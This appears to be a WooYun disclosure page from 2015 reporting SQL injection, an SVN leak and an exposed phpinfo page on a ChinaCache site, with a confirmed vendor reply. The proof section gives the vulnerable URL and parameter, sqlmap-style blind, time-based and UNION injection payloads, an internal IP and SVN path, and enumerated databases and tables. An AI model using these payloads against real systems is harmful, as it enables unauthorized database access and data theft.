ChinaCache某站SQL注射SVN泄露phpinfo信息 | wooyun-2015-0110813| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110813

漏洞标题：ChinaCache某站SQL注射SVN泄露phpinfo信息

漏洞作者：路人甲

提交时间：2015-04-28 11:46

修复时间：2015-06-12 16:12

公开时间：2015-06-12 16:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-28：细节已通知厂商并且等待厂商处理中
2015-04-28：厂商已经确认，细节仅向厂商公开
2015-05-08：细节向核心白帽子及相关领域专家公开
2015-05-18：细节向普通白帽子公开
2015-05-28：细节向实习白帽子公开
2015-06-12：细节向公众公开

简要描述：

233

详细说明：

phpinfo : http://cda.data.chinacache.com/phpinfo.php

svn没太敏感的。但是泄露了一个地址，http://220.181.65.245:88/data/cache2/svn/public/cda/ca/script
2013-11-27T04:24:45.000000Z
6c0edab4dbbc8ab1b4dcd05cc2b26a09
2013-11-27T05:07:51.954648Z
273
yunpeng.dong
has-props
。。。。。。。。。。。。。。

漏洞证明：

SQL：http://cda.data.chinacache.com/customize.php?id=1

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 RLIKE (SELECT (CASE WHEN (4241=4241) THEN 1 ELSE 0x28 END))
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))GUOX)
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178716a71,0x49646b6343554d686341,0x7162717171),NULL,NULL-- 
---
web application technology: Nginx, PHP 5.3.19
back-end DBMS: MySQL 5.0.12
current user is DBA:    False
available databases [8]:
[*] bugtracker
[*] ca_data
[*] ca_data_test
[*] ca_data_test1
[*] ca_database
[*] information_schema
[*] mysql
[*] test
Database: ca_data
[273 tables]
+---------------------------------+
| user                            |
| amazon_flux_stat                |
| area_distribution               |
| bandwidth_stat                  |
| ca_site_channel                 |
| ca_site_channelOp               |
| ccregion                        |
| ccregionsel                     |
| customer                        |
| customerOp                      |
| customer_tree                   |
| customize                       |
| dev_oper_base_12530             |
| dev_oper_base_163               |
| dev_oper_base_163blog           |
| dev_oper_base_163lh             |
| dev_oper_base_163tech           |
| dev_oper_base_163web            |
| dev_oper_base_17zuoye           |
| dev_oper_base_18zuoye           |
| dev_oper_base_37wan             |
| dev_oper_base_Amazon            |
| dev_oper_base_Apple             |
| dev_oper_base_BBK               |
| dev_oper_base_BingMapChina      |
| dev_oper_base_KAIXIN            |
| dev_oper_base_YC                |
| dev_oper_base_Zhezi             |
| dev_oper_base_aobi              |
| dev_oper_base_app               |
| dev_oper_base_autohome          |
| dev_oper_base_babeltime         |
| dev_oper_base_baidu             |
| dev_oper_base_baidu_91          |
| dev_oper_base_bingmapchina      |
| dev_oper_base_china             |
| dev_oper_base_chinabroadcast    |
| dev_oper_base_chinadaily        |
| dev_oper_base_chinataiwan       |
| dev_oper_base_dangdang          |
| dev_oper_base_dawx              |
| dev_oper_base_duowan            |
| dev_oper_base_game2             |
| dev_oper_base_gionee            |
| dev_oper_base_gmw               |
| dev_oper_base_go                |
| dev_oper_base_gov               |
| dev_oper_base_haima             |
| dev_oper_base_huan              |
| dev_oper_base_ifeng             |
| dev_oper_base_ijinshan          |
| dev_oper_base_joyo              |
| dev_oper_base_kaopuyun          |
| dev_oper_base_ku6               |
| dev_oper_base_kunlun            |
| dev_oper_base_lenovomm          |
| dev_oper_base_lianwifi          |
| dev_oper_base_mafengwo          |
| dev_oper_base_meituan           |
| dev_oper_base_meizu             |
| dev_oper_base_micr              |
| dev_oper_base_mingchao          |
| dev_oper_base_mogujie           |
| dev_oper_base_msn               |
| dev_oper_base_muzhiwan          |
| dev_oper_base_neteasewow        |
| dev_oper_base_qunar             |
| dev_oper_base_sina_t            |
| dev_oper_base_sina_weibo        |
| dev_oper_base_soufun            |
| dev_oper_base_suning            |
| dev_oper_base_tizi              |
| dev_oper_base_tuan800           |
| dev_oper_base_tuanmei           |
| dev_oper_base_tuniu             |
| dev_oper_base_vipshop           |
| dev_oper_base_xiaomi            |     小米？
| dev_oper_base_xiaonei           |
| dev_oper_base_xici              |
| dev_oper_base_xinhua            |
| dev_oper_base_xiu8              |
| dev_oper_base_zhezi             |
| dev_oper_netizen_12530          |
| dev_oper_netizen_163            |
| dev_oper_netizen_163blog        |
| dev_oper_netizen_163lh          |
| dev_oper_netizen_163tech        |
| dev_oper_netizen_163web         |
| dev_oper_netizen_17zuoye        |
| dev_oper_netizen_18zuoye        |
| dev_oper_netizen_37wan          |
| dev_oper_netizen_Amazon         |
| dev_oper_netizen_Apple          |
| dev_oper_netizen_BBK            |
| dev_oper_netizen_BingMapChina   |
| dev_oper_netizen_KAIXIN         |
| dev_oper_netizen_YC             |
| dev_oper_netizen_Zhezi          |
| dev_oper_netizen_aobi           |
| dev_oper_netizen_app            |
| dev_oper_netizen_autohome       |
| dev_oper_netizen_babeltime      |
| dev_oper_netizen_baidu          |   百度？
| dev_oper_netizen_baidu_91       |
| dev_oper_netizen_bingmapchina   |
| dev_oper_netizen_china          |
| dev_oper_netizen_chinabroadcast |
| dev_oper_netizen_chinadaily     |
| dev_oper_netizen_chinataiwan    |
| dev_oper_netizen_dangdang       |
| dev_oper_netizen_dawx           |
| dev_oper_netizen_duowan         |
| dev_oper_netizen_game2          |
| dev_oper_netizen_gionee         |
| dev_oper_netizen_gmw            |
| dev_oper_netizen_go             |
| dev_oper_netizen_gov            |
| dev_oper_netizen_haima          |
| dev_oper_netizen_huan           |
| dev_oper_netizen_ifeng          |
| dev_oper_netizen_ijinshan       |
| dev_oper_netizen_joyo           |
| dev_oper_netizen_kaopuyun       |
| dev_oper_netizen_ku6            |
| dev_oper_netizen_kunlun         |
| dev_oper_netizen_lenovomm       |
| dev_oper_netizen_lianwifi       |
| dev_oper_netizen_mafengwo       |    马蜂窝？
| dev_oper_netizen_meituan        |   美团
| dev_oper_netizen_meizu          |
| dev_oper_netizen_micr           |
| dev_oper_netizen_mingchao       |
| dev_oper_netizen_mogujie        |
| dev_oper_netizen_msn            |
| dev_oper_netizen_muzhiwan       |
| dev_oper_netizen_neteasewow     |
| dev_oper_netizen_qunar          |
| dev_oper_netizen_sina_t         |
| dev_oper_netizen_sina_weibo     |
| dev_oper_netizen_soufun         |
| dev_oper_netizen_suning         |
| dev_oper_netizen_tizi           |
| dev_oper_netizen_tuan800        |
| dev_oper_netizen_tuanmei        |
| dev_oper_netizen_tuniu          |
| dev_oper_netizen_vipshop        |
| dev_oper_netizen_xiaomi         |
| dev_oper_netizen_xiaonei        |
| dev_oper_netizen_xici           |
| dev_oper_netizen_xinhua         |
| dev_oper_netizen_xiu8           |
| dev_oper_netizen_zhezi          |
| dev_oper_source_12530           |
| dev_oper_source_163             |     163？
| dev_oper_source_163blog         |
| dev_oper_source_163lh           |
| dev_oper_source_163tech         |
| dev_oper_source_163web          |
| dev_oper_source_17zuoye         |
| dev_oper_source_18zuoye         |
| dev_oper_source_37wan           |
| dev_oper_source_Amazon          |
| dev_oper_source_Apple           |
| dev_oper_source_BBK             |
| dev_oper_source_BingMapChina    |
| dev_oper_source_KAIXIN          |
| dev_oper_source_YC              |
| dev_oper_source_Zhezi           |
| dev_oper_source_aobi            |
| dev_oper_source_app             |
| dev_oper_source_autohome        |
| dev_oper_source_babeltime       |
| dev_oper_source_baidu           |
| dev_oper_source_baidu_91        |
| dev_oper_source_bingmapchina    |
| dev_oper_source_china           |
| dev_oper_source_chinabroadcast  |
| dev_oper_source_chinadaily      |
| dev_oper_source_chinataiwan     |
| dev_oper_source_dangdang        |
| dev_oper_source_dawx            |
| dev_oper_source_duowan          |    多万？
| dev_oper_source_game2           |
| dev_oper_source_gionee          |
| dev_oper_source_gmw             |
| dev_oper_source_go              |
| dev_oper_source_gov             |
| dev_oper_source_haima           |
| dev_oper_source_huan            |
| dev_oper_source_ifeng           |    ifeng
| dev_oper_source_ijinshan        |
| dev_oper_source_joyo            |
| dev_oper_source_kaopuyun        |
| dev_oper_source_ku6             |    酷6
| dev_oper_source_kunlun          |
| dev_oper_source_lenovomm        |
| dev_oper_source_lianwifi        |
| dev_oper_source_mafengwo        |
| dev_oper_source_meituan         |
| dev_oper_source_meizu           |
| dev_oper_source_micr            |
| dev_oper_source_mingchao        |
| dev_oper_source_mogujie         |
| dev_oper_source_msn             |
| dev_oper_source_muzhiwan        |
| dev_oper_source_neteasewow      |
| dev_oper_source_qunar           |    去哪
| dev_oper_source_sina_t          |    
| dev_oper_source_sina_weibo      |    新浪？
| dev_oper_source_soufun          |   搜房
| dev_oper_source_suning          |   苏宁
| dev_oper_source_tizi            |
| dev_oper_source_tuan800         |   团800
| dev_oper_source_tuanmei         |
| dev_oper_source_tuniu           |    途牛
| dev_oper_source_vipshop         |
| dev_oper_source_xiaomi          |
| dev_oper_source_xiaonei         |
| dev_oper_source_xici            |
| dev_oper_source_xinhua          |
| dev_oper_source_xiu8            |
| dev_oper_source_zhezi           |
| device_type                     |
| escape_rate                     |
| exit_page                       |
| exit_rate                       |
| fun_visitor                     |
| hot_resource                    |
| industry_stat                   |
| insertcustomer                  |
| isp                             |
| modules                         |
| net_type                        |
| new_visitors                    |
| order_conversion_path           |
| order_conversion_rate           |
| orderinfo                       |
| page_load_rate                  |
| page_views                      |
| people_purchase                 |
| portal_page                     |
| province                        |
| province_isp_flux               |
| region_attribute                |
| region_fun                      |
| region_isp                      |
| region_mobile                   |
| regiondistribute                |
| revisitors                      |
| sogo_area_flux                  |
| sogo_http_status                |
| sogo_url_flux                   |
| source_device                   |
| source_path                     |
| source_path_fun                 |
| splunk_alert                    |
| splunk_alert_detail             |
| splunk_channel                  |
| splunk_exit_ratio               |
| splunk_visit_stats              |
| status_stat                     |
| subvisitsrate                   |
| ua_analyse                      |
| unique_visitor                  |
| visit_depth                     |
| visit_page                      |
| visit_page_copy                 |
| visit_rate                      |
| visit_time                      |
| visitor_path_site               |
| visitors_loss_rate              |
| visitors_path                   |
| website_stay_time               |
+---------------------------------+
这些表是干什么的？幸好。。
Database: ca_data_test
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| ca_site_channel       | 40640   |
| region_mobile         | 36850   |
| people_purchase       | 29856   |
| visitor_path_site     | 7418    |
| hot_resource          | 2880    |
| province_isp_flux     | 2558    |
| area_distribution     | 2378    |
| ua_analyse            | 1109    |
| industry_stat         | 818     |
| bandwidth_stat        | 720     |
| exit_page             | 720     |
| exit_rate             | 720     |
| page_load_rate        | 720     |
| region_attribute      | 720     |
| region_fun            | 720     |
| source_path_fun       | 720     |
| visit_page            | 720     |
| dev_oper_base_micr    | 718     |
| region_isp            | 709     |
| portal_page           | 708     |
| regiondistribute      | 686     |
| subvisitsrate         | 329     |
| fun_visitor           | 254     |

还有几个bak,看了下，没发现敏感信息。

修复方案：

~~~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-04-28 16:10

厂商回复：

非常感谢您的反馈，正在修复中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110813

漏洞标题：ChinaCache某站SQL注射SVN泄露phpinfo信息

相关厂商：ChinaCache

漏洞作者：路人甲

提交时间：2015-04-28 11:46

修复时间：2015-06-12 16:12

公开时间：2015-06-12 16:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110813

漏洞标题：ChinaCache某站SQL注射SVN泄露phpinfo信息

相关厂商：ChinaCache

漏洞作者： 路人甲

提交时间：2015-04-28 11:46

修复时间：2015-06-12 16:12

公开时间：2015-06-12 16:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0110813"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云